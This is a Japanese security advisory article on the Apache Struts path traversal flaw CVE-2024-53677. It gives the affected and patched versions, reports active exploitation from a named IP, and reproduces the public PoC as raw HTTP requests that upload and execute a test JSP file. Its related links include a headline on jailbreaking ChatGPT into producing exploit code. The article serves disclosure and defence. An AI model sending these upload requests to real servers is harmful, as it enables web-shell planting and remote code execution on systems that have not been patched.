Apache Struts 2.0から6.4.0 未満のバージョンで致命的な脆弱性(CVE-2024-53677)が発生し、その後PoCエクスプロイトが公開されたので、悪用の可能性があります。対象者は引き続きアップデートする事をお勧めします。
目次
脆弱性 CVE-2024-53677 の対象バージョン
Struts 2.0.0 から 6.4.0 未満のバージョン
パッチリリースバージョン
Struts 6.4.0 以降のバージョン
PoCエクスプロイトの概要
この脆弱性(CVE-2024-53677)は、パストラバーサルの問題を引き起こし、攻撃者が制限されたディレクトリにファイルをアップロードできる状態を作り出します。その結果、Webシェルのアップロードを通じて、リモートコード実行(RCE)に繋がるリスクがあります。
Johannes B. Ullrich博士によると、実際にアクティブなエクスプロイトの試みが検出されています。これらの攻撃は、公開されたPoC エクスプロイト コード に従っているようで、攻撃者は脆弱なシステムを特定して侵害することに重点を置いているとしています。
PoCエクスプロイトのシーケンス例
1:悪意のあるファイルのアップロード
以下リクエストは、.jspの悪用の成功を確認するために設計された悪意のあるスクリプトをアップロードします。
POST /actionFileUpload HTTP/1.1
Host: [honeypot IP address]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive
Content-Length: 222
Content-Type: multipart/form-data; boundary=0abcfc26e3fa0afbd6db1ba369dfcc37
--0abcfc26e3fa0afbd6db1ba369dfcc37
Content-Disposition: form-data; name="file"; filename="exploit.jsp"
Content-Type: application/octet-stream
<% out.println("Apache Struts"); %>
--0abcfc26e3fa0afbd6db1ba369dfcc37--2:アップロードされたファイルの確認
攻撃者はアップロードされたスクリプトを見つけて実行しようとします。この場合、侵入が成功したことを示す「Apache Struts」が出力されます。
GET /actionFileUpload/exploit.jsp HTTP/1.1
Host: [honeypot IP]:8090
User-Agent: python-requests/2.32.3
Accept-Encoding: gzip, deflate, zstd
Accept: */*
Connection: keep-alive実際に悪用する兆候が見られる
現在、エクスプロイトの試みは IP アドレス169.150.226.162から行われており、エンドポイントスキャンが行われています。
- 攻撃元IP: 169.150.226.162
- 内容:
- 脆弱なエンドポイントをスキャンし、
/や/cbsなど単純なパスを偵察。 - アップロード関連の脆弱性を狙っている可能性が高い。
- 脆弱なエンドポイントをスキャンし、
関連記事
Apache Struts2で致命的な脆弱性(CVE-2024-53677)
ChatGPTの脱獄、16進数エンコードと絵文字を使用してエクスプロイトコードを出力させる
トロイの木馬化された「jQuery」がnpmやGitHubで拡散
Apache OFBizが重大な脆弱性を修正(CVE-2024-45195)
PyPIの人気ライブラリ「requests」に偽装したバックドア ライブラリ「requests-darwin-lite」を確認
東芝の複合機「e-STUDIO」の複数のシリーズで脆弱性
VMware ESXiの脆弱性をランサムウェア 攻撃グループが悪用(CVE-2024-37085)
ランサムウェア グループ「TellYouThePass」がPHPの脆弱性を利用してサイバー攻撃(CVE-2024-4577)
Hugging FaceでAIのバックドア 付き 機械学習モデルを確認